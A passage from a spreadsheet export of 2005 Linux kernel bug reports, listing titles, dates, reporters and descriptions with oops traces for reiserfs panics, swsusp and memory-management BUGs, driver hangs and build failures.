b8 89 f0 e8 06 b [ 127.503174] &lt;6&gt;note: db2sysc[11883] exited with preempt_count 1 [ 127.523128] scheduling while atomic: db2sysc/0x10000001/11883 [ 127.523135] [&lt;c010417e&gt;] dump_stack+0x1e/0x20 [ 127.523144] [&lt;c0423381&gt;] schedule+0xab1/0xe20 [ 127.523153] [&lt;c0423f6f&gt;] cond_resched+0x2f/0x50 [ 127.523160] [&lt;c01591ad&gt;] unmap_vmas+0x19d/0x290 [ 127.523168] [&lt;c015de3a&gt;] exit_mmap+0x9a/0x190 [ 127.523175] [&lt;c011e1c5&gt;] mmput+0x55/0xf0 [ 127.523184] [&lt;c0122e4e&gt;] exit_mm+0xfe/0x130 [ 127.523190] [&lt;c012389a&gt;] do_exit+0xda/0x4a0 [ 127.523196] [&lt;c01045ae&gt;] die+0x1ae/0x1b0 [ 127.523202] [&lt;c0104639&gt;] do_trap+0x89/0xd0 [ 127.523208] [&lt;c01049b8&gt;] do_invalid_op+0xb8/0xd0 [ 127.523214] [&lt;c0103d53&gt;] error_code+0x4f/0x54 [ 127.523220] [&lt;c017d984&gt;] dupfd+0x64/0xa0 [ 127.523226] [&lt;c017de6d&gt;] do_fcntl+0x16d/0x210 [ 127.523233] [&lt;c017dff2&gt;] sys_fcntl64+0x82/0xa0 [ 127.523239] [&lt;c01031bf&gt;] sysenter_past_esp+0x54/0x75 (l).me to SUSE LINUX Enterprise Server 9 (i586) - Kernel x335a!login: [ 187.831074] ------------[ cut here ]------------ [ 187.846243] kernel BUG at &lt;bad filename&gt;:57323! [ 187.861121] invalid operand: 0000 [#2] [ 187.873428] PREEMPT SMP DEBUG_PAGEALLOC [ 187.886099] Modules linked in: [ 187.896151] CPU: 0 [ 187.896153] EIP: 0060:[&lt;c0169697&gt;] Not tainted VLI [ 187.896155] EFLAGS: 00010282 (2.6.12-mm1-I) [ 187.935652] EIP is at fd_install+0x57/0x60 [ 187.949120] eax: f5083780 ebx: f7d0f680 ecx: 00000001 edx: f46d97c0 [ 187.971425] esi: f7d0f684 edi: 000003c0 ebp: f517ff54 esp: f517ff44 [ 187.993729] ds: 007b es: 007b ss: 0068 [ 188.007183] Process db2sysc (pid: 12086, threadinfo=f517e000 task=f5f19530) [ 188.029513] Stack: f5083580 000003c0 f7d0f684 f46d97c0 f517ff74 c017d984 f7d0f680 f5083580 [ 188.057192] 000003c0 ffffffea fffffff7 00000000 f517ff90 c017de6d f5083580 000003c0 [ 188.084873] 00000005 f5083580 fffffff7 f517ffb4 c017dff2 00000005 00000000 000003c0 [ 188.112552] Call Trace: [ 188.121175] [&lt;c010414b&gt;] show_stack+0xab/0xc0 [ 188.135844] [&lt;c01042e4&gt;] show_registers+0x164/0x1d0 [ 188.152202] [&lt;c010450d&gt;] die+0x10d/0x1b0 [ 188.165420] [&lt;c0104639&gt;] do_trap+0x89/0xd0 [ 188.179207] [&lt;c01049b8&gt;] do_invalid_op+0xb8/0xd0 [ 188.194735] [&lt;c0103d53&gt;] error_code+0x4f/0x54 [ 188.209379] [&lt;c017d984&gt;] dupfd+0x64/0xa0 [ 188.222596] [&lt;c017de6d&gt;] do_fcntl+0x16d/0x210 [ 188.237242] [&lt;c017dff2&gt;] sys_fcntl64+0x82/0xa0 [ 188.252172] [&lt;c01031bf&gt;] sysenter_past_esp+0x54/0x75 [ 188.268816] Code: 00 8b 53 0c 8b 42 0c 8b 04 b8 85 c0 75 1d 8b 42 0c 8b 55 f0 89 14 b8 89 f0 e8 06 b [ 188.332513] &lt;6&gt;note: db2sysc[12086] exited with preempt_count 1 [ 188.352507] scheduling while atomic: db2sysc/0x10000001/12086 [ 188.352515] [&lt;c010417e&gt;] dump_stack+0x1e/0x20 [ 188.352529] [&lt;c0423381&gt;] schedule+0xab1/0xe20 [ 188.352538] [&lt;c0423f6f&gt;] cond_resched+0x2f/0x50 [ 188.352545] [&lt;c01591ad&gt;] unmap_vmas+0x19d/0x290 [ 188.352554] [&lt;c015de3a&gt;] exit_mmap+0x9a/0x190 [ 188.352561] [&lt;c011e1c5&gt;] mmput+0x55/0xf0 [ 188.352569] [&lt;c0122e4e&gt;] exit_mm+0xfe/0x130 [ 188.352576] [&lt;c012389a&gt;] do_exit+0xda/0x4a0 [ 188.352582] [&lt;c01045ae&gt;] die+0x1ae/0x1b0 [ 188.352588] [&lt;c0104639&gt;] do_trap+0x89/0xd0 [ 188.352594] [&lt;c01049b8&gt;] do_invalid_op+0xb8/0xd0 [ 188.352601] [&lt;c0103d53&gt;] error_code+0x4f/0x54 [ 188.352607] [&lt;c017d984&gt;] dupfd+0x64/0xa0 [ 188.352615] [&lt;c017de6d&gt;] do_fcntl+0x16d/0x210 [ 188.352621] [&lt;c017dff2&gt;] sys_fcntl64+0x82/0xa0 [ 188.352628] [&lt;c01031bf&gt;] sysenter_past_esp+0x54/0x75 -----------------------------------</t>
  </si>
  <si>
    <t>Linux 2.6.11.10 + reiserfs + usrquota, reiserfs panic</t>
  </si>
  <si>
    <t>2005-06-21 06:10 UTC</t>
  </si>
  <si>
    <t>Guillaume Pelat</t>
  </si>
  <si>
    <t>2006-01-05 04:17 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: AMD Athlon(tm) XP 3000+ , not smp Software Environment: Reiserfs + usr quota enabled Problem Description: ReiserFS: sda3: warning: vs-15011: reiserfs_release_objectid: tried to free free object id (6924839) ReiserFS: sda3: warning: vs-15011: reiserfs_release_objectid: tried to free free object id (7809292) ReiserFS: sda3: warning: vs-15011: reiserfs_release_objectid: tried to free free object id (7809885) ReiserFS: sda3: warning: vs-15011: reiserfs_release_objectid: tried to free free object id (7810216) ReiserFS: sda3: warning: vs-15011: reiserfs_release_objectid: tried to free free object id (7811698) ReiserFS: sda3: warning: vs-15011: reiserfs_release_objectid: tried to free free object id (7812011) ReiserFS: sda3: warning: vs-15011: reiserfs_release_objectid: tried to free free object id (7812404) ReiserFS: sda3: warning: vs-15011: reiserfs_release_objectid: tried to free free object id (7813157) ReiserFS: sda3: warning: vs-15011: reiserfs_release_objectid: tried to free free object id (7813425) ReiserFS: sda3: warning: vs-13060: reiserfs_update_sd: stat data of object [5882601 5882606 0x0 SD] (nlink == 1) not found (pos 19) ReiserFS: sda3: warning: vs-13060: reiserfs_update_sd: stat data of object [5882601 5882606 0x0 SD] (nlink == 1) not found (pos 19) ReiserFS: sda3: warning: vs-13060: reiserfs_update_sd: stat data of object [5882601 5882606 0x0 SD] (nlink == 1) not found (pos 19) ReiserFS: sda3: warning: vs-13060: reiserfs_update_sd: stat data of object [5882601 5882606 0x0 SD] (nlink == 1) not found (pos 19) ReiserFS: sda3: warning: vs-13060: reiserfs_update_sd: stat data of object [5882601 5882606 0x0 SD] (nlink == 1) not found (pos 19) ReiserFS: sda3: warning: vs-13060: reiserfs_update_sd: stat data of object [5882601 5882606 0x0 SD] (nlink == 1) not found (pos 19) ReiserFS: sda3: warning: vs-13060: reiserfs_update_sd: stat data of object [5882601 5882606 0x0 SD] (nlink == 1) not found (pos 19) ReiserFS: sda3: warning: vs-13060: reiserfs_update_sd: stat data of object [5882601 5882606 0x0 SD] (nlink == 1) not found (pos 19) ReiserFS: sda3: warning: vs-13060: reiserfs_update_sd: stat data of object [5882601 5882606 0x0 SD] (nlink == 1) not found (pos 19) ReiserFS: sda3: warning: vs-13060: reiserfs_update_sd: stat data of object [5882601 5882606 0x0 SD] (nlink == 1) not found (pos 19) ReiserFS: sda3: warning: vs-13060: reiserfs_update_sd: stat data of object [5882601 5882606 0x0 SD] (nlink == 1) not found (pos 19) ReiserFS: sda3: warning: vs-13060: reiserfs_update_sd: stat data of object [5882601 5882606 0x0 SD] (nlink == 1) not found (pos 19) ReiserFS: sda3: warning: vs-13060: reiserfs_update_sd: stat data of object [5882601 5882606 0x0 SD] (nlink == 1) not found (pos 19) ReiserFS: sda3: warning: vs-13060: reiserfs_update_sd: stat data of object [5882601 5882606 0x0 SD] (nlink == 1) not found (pos 19) ReiserFS: sda3: warning: vs-13060: reiserfs_update_sd: stat data of object [5882601 5882606 0x0 SD] (nlink == 1) not found (pos 19) TCP: Treason uncloaked! Peer 200.114.207.51:64840/80 shrinks window 2791985686:2792001470. Repaired. ReiserFS: warning: vs-16090: direntry_bytes_number: bytes number is asked for direntry ReiserFS: warning: vs-16090: direntry_bytes_number: bytes number is asked for direntry REISERFS: panic (device Null superblock): free space 4024, entry_count 1 ------------[ cut here ]------------ kernel BUG at fs/reiserfs/prints.c:362! invalid operand: 0000 [#1] CPU: 0 EIP: 0060:[&lt;c019782f&gt;] Not tainted VLI EFLAGS: 00010286 (2.6.11.10-endy) EIP is at reiserfs_panic+0x4f/0x80 eax: 0000004d ebx: c02be9bf ecx: 00000001 edx: c02eecac esi: 00000000 edi: 00000140 ebp: cfc65864 esp: cfc6584c ds: 007b es: 007b ss: 0068 Process pure-ftpd (pid: 2473, threadinfo=cfc64000 task=f34bda40) Stack: c02c3ee0 c02be9bf c03b3580 00000fb8 ef34a0c4 00000001 cfc6588c c01a993f 00000000 c02c6ac0 00000fb8 00000001 00010000 00000000 ef34a01c 00000000 cfc658e0 c0190233 ef34a01c 00000fd0 00000000 00000000 00000000 cfc658e0 Call Trace: [&lt;c010282f&gt;] show_stack+0x7f/0xa0 [&lt;c01029d1&gt;] show_registers+0x151/0x1c0 [&lt;c0102bc8&gt;] die+0xc8/0x150 [&lt;c010307c&gt;] do_invalid_op+0xbc/0xd0 [&lt;c01024bb&gt;] error_code+0x2b/0x30 [&lt;c01a993f&gt;] direntry_check_left+0x8f/0x90 [&lt;c0190233&gt;] get_num_ver+0x303/0x350 [&lt;c01912dc&gt;] ip_check_balance+0x3ec/0xbb0 [&lt;c0192bcb&gt;] fix_nodes+0x15b/0x420 [&lt;c019fdbf&gt;] reiserfs_cut_from_item+0x10f/0x5f0 [&lt;c01a0638&gt;] reiserfs_do_truncate+0x2e8/0x610 [&lt;c019f7bf&gt;] reiserfs_delete_object+0x3f/0x80 [&lt;c018633c&gt;] reiserfs_delete_inode+0x8c/0x110 [&lt;c015ed55&gt;] generic_delete_inode+0x95/0x130 [&lt;c015ef96&gt;] iput+0x56/0x80 [&lt;c018992a&gt;] reiserfs_new_inode+0x13a/0x740 [&lt;c0184787&gt;] reiserfs_create+0x97/0x1b0 [&lt;c0153ddf&gt;] vfs_create+0x9f/0x120 [&lt;c01546c9&gt;] open_namei+0x5d9/0x630 [&lt;c0144b8c&gt;] filp_open+0x3c/0x60 [&lt;c0144ea6&gt;] sys_open+0x46/0x90 [&lt;c0102313&gt;] syscall_call+0x7/0xb Code: 01 00 00 89 04 24 e8 31 fd ff ff c7 04 24 e0 3e 2c c0 85 f6 89 d8 0f 45 c7 ba 80 35 3b c0 8954 24 08 89 44 24 04 e8 f1 a9 f7 ff &lt;0f&gt; 0b 6a 01 02 ef 2b c0 c7 04 24 20 3f 2c c0 85 f6 b9 80 35 3b</t>
  </si>
  <si>
    <t>Zhang Rui</t>
  </si>
  <si>
    <t>amd64: raw1394 returns EINVAL</t>
  </si>
  <si>
    <t>2005-06-22 09:56 UTC</t>
  </si>
  <si>
    <t>2008-02-19 11:35 UTC</t>
  </si>
  <si>
    <t>From: Xavier Bestel &lt;xavier.bestel@free.fr&gt; http://marc.theaimsgroup.com/?t=111929555100004&amp;r=1&amp;w=2 When using dvgrab (32bits userspace) on an amd64, the 1st write() syscall on /dev/raw1394 fails with -EINVAL on a 64bits kernel, whereas it works on a 32bits kernel.</t>
  </si>
  <si>
    <t>Failed to build kernel 2.6.12 with mm1 patch on OpenPower system</t>
  </si>
  <si>
    <t>2.6.12 mm1</t>
  </si>
  <si>
    <t>2005-06-22 20:13 UTC</t>
  </si>
  <si>
    <t>2005-07-25 08:16 UTC</t>
  </si>
  <si>
    <t>Distribution: RHEL4 with kernel 2.6.12-mm1 Hardware Environment: IBM OpenPower( CHRP IBM,9124-720 ) Software Environment: RHEL4 Problem Description: Failed to build kernel 2.6.12 with mm1 patch with RHEL4 on OpenPower 720. Steps to reproduce: 1. download kernel 2.6.12 and 2.6.12-mm1 patch from www.kernel.org 2. extract the kernel and the mm1 patch 3. patch mm1 patch to kernel 2.6.12 4. build the kernel Addition information: Here is the build output from the screen. ...... GEN .version CHK include/linux/compile.h UPD include/linux/compile.h CC init/version.o LD init/built-in.o LD .tmp_vmlinux1 kernel/built-in.o(.init.text+0x4b8): In function `sched_cacheflush': kernel/sched.c:5292: undefined reference to `.cacheflush' make: *** [.tmp_vmlinux1] Error 1</t>
  </si>
  <si>
    <t>Conservative governor makes me lose my USB keyboard</t>
  </si>
  <si>
    <t>2005-06-23 00:34 UTC</t>
  </si>
  <si>
    <t>Richard Van Den Boom</t>
  </si>
  <si>
    <t>2005-10-29 08:50 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware-current Hardware Environment: Bi-Opteron system with Tiger K8W board, Logitech USB keyboard Software Environment: Self-compiled 2.6.12rc6 and 2.6.12 kernels with kernel.org sources without patches, GCC 3.4.2, KDE 3.4.1 using the Logitech driver. Problem Description: When I set up "conservative" as scaling governor (using a simple 'echo "conservative" &gt; /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor' for CPU0 and CPU1 at boot), I cannot type anything in consoles and applications (like Kword, for instance) anymore. The oly way I can get my keyboard back is rebooting. When I use "ondemand", I don't have such problem at all. My keyboard is a Logitech Internet Navigator USB keyboard. I cannot test a PS/2 keyboard on this system, the PS/2 connector doesn't work since I plugged a second CPU in it. Everything works find, though, on this system, with any governor except the "conservative" one, so my guess is that it still has some quirks. Steps to reproduce: Plug a USB keyboard and set "conservative" as CPU governor for both processors on a dual-Opteron system. It occurs every time to me, usually 10 to 20 seconds after typing something.</t>
  </si>
  <si>
    <t>2.6.12.1</t>
  </si>
  <si>
    <t>Kernel-2.6.12.1 on RHEL4 distro: sleeping function called from invalid context at mm/slab.c:2093</t>
  </si>
  <si>
    <t>2.6.12.1 from kernel.org</t>
  </si>
  <si>
    <t>2005-06-23 10:01 UTC</t>
  </si>
  <si>
    <t>2005-07-29 08:19 UTC</t>
  </si>
  <si>
    <t>Distribution:RHEL4.0 Hardware Environment: Kernel-2.6.12 on RHEL4-u1-rc3 distro: sleeping function called from invalid context at mm/slab.c:2093 Software Environment: Linux DISTRO:RHEL4.0 Problem Description: During the kernel boot the following error is logged in the /var/log/messages: Debug: sleeping function called from invalid context at mm/slab.c:2093 THIS PROBLEM WAS SEEN ON kernel-2.6.12 also. Steps to reproduce: Install RHEL4.0-U1-rc3. Reboot Download kernel-2.6.12.1 from kernel.org Build the kernel and reboot. This message will appear in the /var/log/messages file.</t>
  </si>
  <si>
    <t>Hang on boot after "Initializing CPU#2"</t>
  </si>
  <si>
    <t>2005-06-24 13:39 UTC</t>
  </si>
  <si>
    <t>2005-08-01 04:44 UTC</t>
  </si>
  <si>
    <t>From: Alexander Y. Fomichev &lt;gluk@php4.ru&gt; http://marc.theaimsgroup.com/?t=111944999100004&amp;r=1&amp;w=2 http://marc.theaimsgroup.com/?t=111951467900006&amp;r=1&amp;w=2 I've been trying to switch from 2.6.12-rc3 to 2.6.12 on Dual EM64T 2.8 GHz [ MoBo: Intel E7520, intel 82801 ] but kernel hangs on boot right after records: Booting processor 2/1 rip 6000 rsp ffff8100023dbf58 Initializing CPU#2 ( below is a link to full boot trace, actually -git3 but no differences) http://sysadminday.org.ru/2.6.12-hang-on-boot/2.6.12-git3-hang An attempt to enable debug: +CONFIG_ACPI_DEBUG=y +CONFIG_DEBUG_SLAB=y +CONFIG_DEBUG_PREEMPT=y +CONFIG_DEBUG_SPINLOCK=y +CONFIG_DEBUG_SPINLOCK_SLEEP=y +CONFIG_DEBUG_KOBJECT=y +CONFIG_DEBUG_INFO=y +CONFIG_INIT_DEBUG=y gives rather strange result, kernel boots successfully ( with a lot of debuging messages of course but i couldn't find something suspicious ) http://sysadminday.org.ru/2.6.12-hang-on-boot/2.6.12-git3-debug config for 2.6.12 have been taken from previous one, only 'make oldconfig' has been made. http://sysadminday.org.ru/2.6.12-hang-on-boot/2.6.12-git3.config Hang 100% reproducible on at least two of my EM64T hosts. ( actualy the same configuration as of MoBo/CPU )</t>
  </si>
  <si>
    <t>2.6.12-mm1 crashes on unmounting partition</t>
  </si>
  <si>
    <t>2005-06-24 14:49 UTC</t>
  </si>
  <si>
    <t>Alexander Hunziker</t>
  </si>
  <si>
    <t>2005-12-21 19:12 UTC</t>
  </si>
  <si>
    <t>Distribution: Arch Linux Hardware Environment: 845 Chipset, HDD connected via ATA Port. Software Environment: Problem Description: Upon shutdown, while trying to unmount the filesystems, my system hangs. Message is (excerpt): Soft lockup detected on CPU#0! inotify_unmount_inodes+0x2d/0x110 Steps to reproduce:</t>
  </si>
  <si>
    <t>mmap returns nil when called</t>
  </si>
  <si>
    <t>2005-06-24 16:46 UTC</t>
  </si>
  <si>
    <t>Kamil Choudhury</t>
  </si>
  <si>
    <t>2008-09-22 09:06 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 2.6.12 Hardware Environment: AMD x86 64 bit Software Environment: Problem Description: when called, mmap returns "nil" instead of a valid pointer to a location in memory. Steps to reproduce: in C: printf("%p\n", mmap (0, sResourceReqs-&gt;size, PROT_READ|PROT_WRITE, MAP_SHARED, iDeviceIndex, 0)); where iDeviceIndex is a valid file descriptor for a Logitech Quickcam 4000 Pro. All relevant libraries have been included (namely, &lt;sys/mman.h&gt;). Apologies in advance if the details are sketchy. However, reading the man page suggested that the only returns should be -1 or a pointer, and not "nil".</t>
  </si>
  <si>
    <t>swsusp causes kernel BUG just after "freeing memory ...done"</t>
  </si>
  <si>
    <t>2005-06-26 05:50 UTC</t>
  </si>
  <si>
    <t>Johannes Schaub</t>
  </si>
  <si>
    <t>2011-07-30 05:12 UTC</t>
  </si>
  <si>
    <t>Distribution: Vanilla Kernel with ck2 patches Hardware Environment: Athlon XP 2500 please note that these outputs are taken ofter a restart: ################################################################### Output of cpuinfo: processor : 0 vendor_id : AuthenticAMD cpu family : 6 model : 10 model name : AMD Athlon(tm) XP 3200+ stepping : 0 cpu MHz : 2315.533 cache size : 512 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep m trr pge mca cmov pat pse36 mmx fxsr sse syscall mmxext 3dnowext 3dnow bogomips : 4571.13 ########################################################################## output of /proc/modules asb100 19860 0 - Live 0xd0ba7000 i2c_sensor 2752 1 asb100, Live 0xd0b9d000 sk98lin 161696 0 - Live 0xd0c0c000 ohci1394 30580 0 - Live 0xd0b75000 ieee1394 286772 1 ohci1394, Live 0xd0bc4000 forcedeth 16128 0 - Live 0xd0b49000 ehci_hcd 30344 0 - Live 0xd0b40000 ohci_hcd 18820 0 - Live 0xd087a000 usbcore 101980 3 ehci_hcd,ohci_hcd, Live 0xd0b51000 i2c_nforce2 5568 0 - Live 0xd083c000 i2c_core 17360 3 asb100,i2c_sensor,i2c_nforce2, Live 0xd0874000 ######################################################################## outptut of /proc/ioports: 0000-001f : dma1 0020-0021 : pic1 0040-0043 : timer0 0050-0053 : timer1 0060-006f : keyboard 0070-0077 : rtc 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0170-0177 : ide1 01f0-01f7 : ide0 0376-0376 : ide1 03c0-03df : vesafb 03f6-03f6 : ide0 0cf8-0cff : PCI conf1 4000-407f : motherboard 4000-4003 : PM1a_EVT_BLK 4004-4005 : PM1a_CNT_BLK 4008-400b : PM_TMR 4020-4027 : GPE0_BLK 4080-40ff : motherboard 4080-40ff : pnp 00:00 4200-427f : motherboard 4200-427f : pnp 00:00 4280-42ff : motherboard 4280-42ff : pnp 00:00 4400-447f : motherboard 4400-447f : pnp 00:00 4480-44ff : motherboard 44a0-44af : GPE1_BLK 5000-503f : motherboard 5000-503f : pnp 00:01 5000-5007 : nForce2 SMBus 5500-553f : motherboard 5500-553f : pnp 00:01 5500-5507 : nForce2 SMBus 9000-9fff : PCI Bus #01 9000-90ff : 0000:01:04.0 9000-90ff : SysKonnect SK-98xx 9400-94ff : 0000:01:0a.0 b000-b0ff : 0000:00:06.0 b000-b0ff : NVidia nForce2 b400-b47f : 0000:00:06.0 b400-b47f : NVidia nForce2 c000-c01f : 0000:00:01.1 c400-c407 : 0000:00:04.0 c400-c407 : forcedeth f000-f00f : 0000:00:09.0 f000-f007 : ide0 f008-f00f : ide1 ########################################################################## output of /proc/iomem 00000000-0009fbff : System RAM 0009fc00-0009ffff : reserved 000a0000-000bffff : Video RAM area 000c0000-000c7fff : Video ROM 000cc000-000cd7ff : Adapter ROM 000ce000-000cefff : Adapter ROM 000f0000-000fffff : System ROM 00100000-0ffeffff : System RAM 00100000-003017bf : Kernel code 003017c0-003dc2ff : Kernel data 0fff0000-0fff2fff : ACPI Non-volatile Storage 0fff3000-0fffffff : ACPI Tables e0000000-e3ffffff : 0000:00:00.0 e4000000-e7ffffff : PCI Bus #01 e5000000-e5003fff : 0000:01:06.0 e6000000-e67fffff : 0000:01:06.0 e7000000-e7003fff : 0000:01:04.0 e7000000-e7003fff : SysKonnect SK-98xx e7004000-e70040ff : 0000:01:0a.0 e8000000-e8ffffff : PCI Bus #01 e8000000-e87fffff : 0000:01:06.0 e8000000-e81fffff : vesafb ea000000-ea07ffff : 0000:00:05.0 ea080000-ea080fff : 0000:00:02.0 ea080000-ea080fff : ohci_hcd ea081000-ea081fff : 0000:00:06.0 ea081000-ea081fff : NVidia nForce2 ea083000-ea083fff : 0000:00:02.1 ea083000-ea083fff : ohci_hcd ea084000-ea0840ff : 0000:00:02.2 ea084000-ea0840ff : ehci_hcd ea085000-ea085fff : 0000:00:04.0 ea085000-ea085fff : forcedeth ea086000-ea0867ff : 0000:00:0d.0 ea086000-ea0867ff : ohci1394 ea087000-ea08703f : 0000:00:0d.0 fec00000-fec00fff : reserved fee00000-fee00fff : reserved ffff0000-ffffffff : reserved Problem Description: being in KDE i typed /sbin/swsusp as root. the console switches and output the following (shorted output as i had to copy it by hand): ################################################################### Freeing memory... done(28733 pages freed) need to copy 32749 pages ------------ [cut here]-------------------------- kernel BUG at kernel/power/swsusp.c:734! invalid operand: 0000 [#1] PREEMPT Modules linked in: asb100 i2c_sensor sk98lin ohci1394 ieee1394 forcedeth ehci_hcd usbcore i2c_nforce2 i2c_core [... ... ... ...] [... ... ... ...] [... ... ... ...] call trace: [...] swsusp_suspend [...] pm_suspend_disk [...] enter_state [...] sys_reboot [...] handle_mm_fault [...] do_page_fault [...] sys_rt_sigaction [...] dput [...] __fput [...] filp_close [...] do_page_fault [...] sysenter_pout_esp note: swsusp[5449] exited with preempt_cout 1</t>
  </si>
  <si>
    <t>Kernel BUG at "mm/memory.c":911</t>
  </si>
  <si>
    <t>2005-06-26 09:11 UTC</t>
  </si>
  <si>
    <t>2005-08-05 05:03 UTC</t>
  </si>
  <si>
    <t>From: Alexander Nyberg &lt;alexn@telia.com&gt; http://marc.theaimsgroup.com/?t=111954005200002&amp;r=1&amp;w=2 As I only have one x86_64 which is my main workstation it's far too tedious to do binary searching (this doesn't happen on x86). Happens with both latest -git [Thu, 23 Jun 2005 17:13:50 +0200 --adobriyan] and 2.6.12-mm1 The tools to reproduce this is at: http://serkiaden.mine.nu/kp2.tar Just do: gdb lyze run and it crashes here giving: ----------- [cut here ] --------- [please bite here ] --------- Kernel BUG at "mm/memory.c":911 invalid operand: 0000 [1] PREEMPT SMP CPU 1 Modules linked in: snd_intel8x0 snd_ac97_codec snd_pcm_oss snd_mixer_oss snd_pcm snd_timer snd soundcore snd_page_alloc Pid: 1285, comm: gdb Not tainted 2.6.12 RIP: 0010:[&lt;ffffffff80162b46&gt;] &lt;ffffffff80162b46&gt;{get_user_pages+326} RSP: 0018:ffff810030e3de48 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffffffffffaf5000 RCX: 0000000001e06000 RDX: ffff810000000000 RSI: 03fffffffffff000 RDI: ffffffff803900a0 RBP: ffffffffffaf5440 R08: 0000000000000000 R09: 0000000000000001 R10: 00007fffff95f398 R11: 0000000000000293 R12: 0000000000000000 R13: 0000000000000000 R14: ffff810037eb3240 R15: ffff810037eb3240 FS: 00002aaaab31c090(0000) GS:ffffffff804882c0(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b CR2: 00002aaaab12a288 CR3: 0000000028146000 CR4: 00000000000006e0 Process gdb (pid: 1285, threadinfo ffff810030e3c000, task ffff8100316a55b0) Stack: 0000000000000246 ffffffff8011d479 0000000000003950 0000000000000246 0000000000000246 0000001037eb3298 0000000100000000 0000000100000000 ffff810034298df0 ffff810030e3df08 Call Trace:&lt;ffffffff8011d479&gt;{do_page_fault+601} &lt;ffffffff8013a596&gt;{access_process_vm+134} &lt;ffffffff80110e6e&gt;{sys_ptrace+318} &lt;ffffffff8010e569&gt;{error_exit+0} &lt;ffffffff8010da1a&gt;{system_call+126} Code: 0f 0b 70 6c 2f 80 ff ff ff ff 8f 03 48 c1 eb 09 48 21 f0 81 RIP &lt;ffffffff80162b46&gt;{get_user_pages+326} RSP &lt;ffff810030e3de48&gt; &lt;6&gt;lyze[1286]: segfault at ffffffffffaf5447 rip 0000000000400d6b rsp 00007fffffaf5420 error 4</t>
  </si>
  <si>
    <t>rmmod ohci1394 hangs in klist_remove</t>
  </si>
  <si>
    <t>2.6.12-git5</t>
  </si>
  <si>
    <t>2005-06-26 09:32 UTC</t>
  </si>
  <si>
    <t>2005-07-01 10:28 UTC</t>
  </si>
  <si>
    <t>From: Stelian Pop &lt;stelian@popies.net&gt; http://marc.theaimsgroup.com/?t=111953816100002&amp;r=1&amp;w=2 Removing the ohci1394 module no longer works, sysrq+t shows: rmmod D 0FF7F724 0 6044 6038 (NOTLB) Call trace: [c00073ec] __switch_to+0x48/0x70 [c02954c8] schedule+0x348/0x6f8 [c02958f0] wait_for_completion+0x78/0xe4 [c0294c1c] klist_remove+0x24/0x38 [c01313ec] device_del+0x34/0xb8 [c0131488] device_unregister+0x18/0x30 [c0185afc] nodemgr_remove_ne+0x6c/0x88 [c0185b2c] __nodemgr_remove_host_dev+0x14/0x28 [c0131520] device_for_each_child+0x4c/0x74 [c0185b68] nodemgr_remove_host_dev+0x28/0x6c [c018234c] __unregister_host+0xdc/0xe0 [c0182e98] highlevel_remove_host+0x70/0xd8 [c0181cc0] hpsb_remove_host+0x60/0x8c [e2218fec] ohci1394_pci_remove+0x5c/0x288 [ohci1394] [c00e02d0] pci_device_remove+0x60/0x64 This is with the latest Linus' git tree [Thu, 23 Jun 2005 16:40:10 +0200 --adobriyan], on a Powerbook laptop (ppc). Removing the module works with stock 2.4.12 [2.6.12? --adobriyan].</t>
  </si>
  <si>
    <t>System hangs and some of CUPs don't take control while running stress test on RHEL4 with kernel 2.6.12</t>
  </si>
  <si>
    <t>2005-06-26 19:47 UTC</t>
  </si>
  <si>
    <t>Wang Lei</t>
  </si>
  <si>
    <t>2005-07-31 19:34 UTC</t>
  </si>
  <si>
    <t>Distribution: RHEL4 with kernel 2.6.12 Hardware Environment: IBM OpenPower( CHRP IBM,9124-720 ) Software Environment: RHEL4 SDET DOTS 1.1.1(http://sourceforge.net/projects/ltp/) DB2 8.2.1 Problem Description: The test machine hangs and some of CUPs don't take control while running stress test(SDET + DOTS(DB2)) Steps to reproduce: 1. Build kernel 2.6.12 and install DOTS, DB2 and SDET 2. Run DOTS and SDET to stress the machine. 3. The machine hit a hang about 60 hours later. Here is information from the xmon: ------------------------------------------------------------------ 3:mon&gt; c0 cpu 0 didn't take control 3:mon&gt; c1 1:mon&gt; e cpu 0x1: Vector: 501 (Hardware Interrupt) at [c000000086b67b20] pc: c00000000000fff8: .dedicated_idle+0x114/0x270 lr: c0000000000100b0: .dedicated_idle+0x1cc/0x270 sp: c000000086b67da0 msr: 8000000000009032 current = 0xc000000002717030 paca = 0xc000000000485000 pid = 0, comm = swapper 1:mon&gt; t [c000000086b67e90] c000000000010348 .cpu_idle+0x38/0x4c [c000000086b67f00] c00000000003b254 .start_secondary+0x108/0x144 [c000000086b67f90] c00000000000bd84 .enable_64b_mode+0x0/0x28 1:mon&gt; c2 cpu 2 didn't take control 1:mon&gt; c3 3:mon&gt; e cpu 0x3: Vector: 100 (System Reset) at [c000000083fa3b20] pc: c00000000000fff0: .dedicated_idle+0x10c/0x270 lr: c0000000000100b0: .dedicated_idle+0x1cc/0x270 sp: c000000083fa3da0 msr: 8000000000089032 current = 0xc000000002713030 paca = 0xc000000000486000 pid = 0, comm = swapper 3:mon&gt; t [c000000083fa3e90] c000000000010348 .cpu_idle+0x38/0x4c [c000000083fa3f00] c00000000003b254 .start_secondary+0x108/0x144 [c000000083fa3f90] c00000000000bd84 .enable_64b_mode+0x0/0x28 ------------------------------------------------------------------- It showed that two CPU didn't take control. I reran the test. Two hours later it hung again and xmon told me that one CPU didn't take control this time.</t>
  </si>
  <si>
    <t>Early vlan adding leads to not functional device</t>
  </si>
  <si>
    <t>&gt;=2.6.12-rc4</t>
  </si>
  <si>
    <t>2005-06-28 06:26 UTC</t>
  </si>
  <si>
    <t>Martin Filip</t>
  </si>
  <si>
    <t>2005-07-13 02:03 UTC</t>
  </si>
  <si>
